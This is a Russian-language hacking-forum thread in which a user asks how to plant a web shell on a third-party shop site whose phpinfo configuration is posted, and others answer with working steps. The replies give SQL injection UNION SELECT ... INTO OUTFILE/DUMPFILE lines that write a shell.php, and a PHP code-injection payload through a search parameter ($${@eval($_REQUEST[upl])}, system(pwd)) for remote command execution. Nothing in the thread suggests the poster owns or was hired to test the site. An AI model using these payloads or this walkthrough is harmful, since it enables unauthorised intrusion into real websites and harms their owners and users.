HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 28.05.2015, 21:34
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786

Репутация: 40


По умолчанию

Всем приветик.

Нашёл сайтик там в одной и формы есть уязвимость

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]eval()[/COLOR][COLOR="#DD0000"]'d code on line 1[/COLOR][/COLOR] 
Как я понимаю можно залит шел. Подскажите пожалуйста как это можно сделать

phpinfo

.SpoilerTarget" type="button">Spoiler
PHP Version 5.3.3-7+squeeze19

Directive Local Value Master Value

allow_call_time_pass_reference Off Off

allow_url_fopen On On

allow_url_include Off Off

always_populate_raw_post_data Off Off

arg_separator.input & &

arg_separator.output & &

asp_tags Off Off

auto_append_file no value no value

auto_globals_jit On On

auto_prepend_file no value no value

browscap no value no value

default_charset no value no value

default_mimetype text/html text/html

define_syslog_variables Off Off

disable_classes no value no value

disable_functions no value no value

display_errors On Off

display_startup_errors Off Off

doc_root no value no value

docref_ext no value no value

docref_root no value no value

enable_dl Off Off

error_append_string no value no value

error_log no value no value

error_prepend_string no value no value

error_reporting 0 22527

exit_on_timeout Off Off

expose_php On On

extension_dir /usr/lib/php5/20090626 /usr/lib/php5/20090626

file_uploads On On

highlight.bg #FFFFFF #FFFFFF

highlight.comment #FF8000 #FF8000

highlight.default #0000BB #0000BB

highlight.html #000000 #000000

highlight.keyword #007700 #007700

highlight.string #DD0000 #DD0000

html_errors Off Off

ignore_repeated_errors Off Off

ignore_repeated_source Off Off

ignore_user_abort Off Off

implicit_flush Off Off

include_path /var/www/kuzov-mag.ru/data/www/kuzov-mag.ru/netcat/require/lib/ .:/usr/share/php:/usr/share/pear

log_errors On On

log_errors_max_len 1024 1024

magic_quotes_gpc On Off

magic_quotes_runtime Off Off

magic_quotes_sybase Off Off

mail.add_x_header On On

mail.force_extra_parameters no value no value

mail.log no value no value

max_execution_time 1000 600

max_file_uploads 20 20

max_input_nesting_level 64 64

max_input_time 60 60

max_input_vars 5000 5000

memory_limit 1048576000 512M

open_basedir /var/www/kuzov-mag.ru/data:. no value

output_buffering 4096 4096

output_handler no value no value

post_max_size 100M 100M

precision 14 14

realpath_cache_size 4096k 4096k

realpath_cache_ttl 120 120

register_argc_argv Off Off

register_globals Off Off

register_long_arrays Off Off

report_memleaks On On

report_zend_debug On On

request_order GP GP

safe_mode Off Off

safe_mode_exec_dir no value no value

safe_mode_gid Off Off

safe_mode_include_dir no value no value

sendmail_from no value no value

sendmail_path /usr/sbin/sendmail -t -i -f webmaster@kuzov-mag.ru /usr/sbin/sendmail -t -i

serialize_precision 100 100

short_open_tag On On

SMTP localhost localhost

smtp_port 25 25

sql.safe_mode Off Off

track_errors Off Off

unserialize_callback_func no value no value

upload_max_filesize 100M 100M

upload_tmp_dir /var/www/kuzov-mag.ru/data/mod-tmp no value

user_dir no value no value

user_ini.cache_ttl 300 300

user_ini.filename .user.ini .user.ini

variables_order GPCS GPCS

xmlrpc_error_number 0 0

xmlrpc_errors Off Off

y2k_compliance On On

zend.enable_gc On On

и ещё, через sql inj заливаю шел, шел заливается, но файл пустой

использую такую команду

PHP код:
[COLOR="#000000"]INTO outfile'путь до папки куда можно залить/123.php' FIELDS TERMINATED BY '[COLOR="#0000BB"][/COLOR]'[/COLOR
заранее спасибо ))
 
Ответить с цитированием

  #2  
Старый 28.05.2015, 22:23
Mister_Bert0ni
Участник форума
Регистрация: 10.05.2015
Сообщений: 142
Провел на форуме:
35015

Репутация: 57
По умолчанию

А пробовал так:

union select null,null,(hex()),null,....,null into dumpfile /ful_path/writable_dir/shell.php

union select null,null,(hex()),null,....,null into outfile /ful_path/writable_dir/shell.php
 
Ответить с цитированием

  #3  
Старый 28.05.2015, 23:09
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786

Репутация: 40


По умолчанию

а ты попробуй. У меня только две идеи , конвертировать в АССКи и заливать в временную папку, потом копировать.Больше идей нету (((
 
Ответить с цитированием

  #4  
Старый 29.05.2015, 00:28
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

а я бы тоже попробовал, только сайта нет. и кстати, вы уже большие и можете писать в раздел уязвимостей в ветку вопросов
 
Ответить с цитированием

  #5  
Старый 29.05.2015, 00:51
Take_IT
Постоянный
Регистрация: 11.03.2013
Сообщений: 354
Провел на форуме:
97570

Репутация: 267
По умолчанию

Цитата:
Сообщение от faza02  

а я бы тоже попробовал, только сайта нет. и кстати, вы уже большие и можете писать в раздел уязвимостей в ветку вопросов
я бы именно так и порекомендовал делать всем, кто уже имеет 5 репы и собирается создавать новую тему
 
Ответить с цитированием

  #6  
Старый 29.05.2015, 11:12
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

с RCE все просто: там фильтровались кавычки, но нам они и не нужны.

делаем запрос:

Код:
http://www.site.ru/search/?action=index&text=$${@eval($_REQUEST[upl])}
в код страницы вставляем форму для аплоада:

Код:

грузим шелл. смотрим текущую папку

Код:
http://www.site.ru/search/?action=index&text=$${@system(pwd)}
все, переходим по ссылке на шелл.

P. S. при создании темы делайте название более информативным
 
Ответить с цитированием

  #7  
Старый 29.05.2015, 11:14
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786

Репутация: 40


По умолчанию

Цитата:
Сообщение от faza02  

с RCE все просто: там фильтровались кавычки, но нам они и не нужны.
делаем запрос:
Код:
http://www.site.ru/search/?action=index&text=$${@eval($_REQUEST[upl])}
в код страницы вставляем форму для аплоада:
Код:

грузим шелл. смотрим текущую папку
Код:
http://www.site.ru/search/?action=index&text=$${@system(pwd)}
все, переходим по ссылке на шелл.
P. S. при создании темы делайте название более информативным
Спасибо. Да Извиняюсь за нарушение правил. Больше не буду так.
 
Ответить с цитированием

  #8  
Старый 29.05.2015, 12:48
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786

Репутация: 40


По умолчанию

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.site.ru/search/?action=index&text=$${@eval($_REQUEST[upl])}[/COLOR][/COLOR] 
Я немного не понял , что это даст?
 
Ответить с цитированием

  #9  
Старый 29.05.2015, 12:51
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от BabaDook  

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.site.ru/search/?action=index&text=$${@eval($_REQUEST[upl])}[/COLOR][/COLOR] 
Я немного не понял , что это даст?
выполнение через eval() команд из POST и GET параметра upl
 
Ответить с цитированием

  #10  
Старый 29.05.2015, 14:25
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786

Репутация: 40


По умолчанию

Цитата:
Сообщение от faza02  

выполнение через eval() команд из POST и GET параметра upl
Пойду мануалы курить. Ещё раз спасибо.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.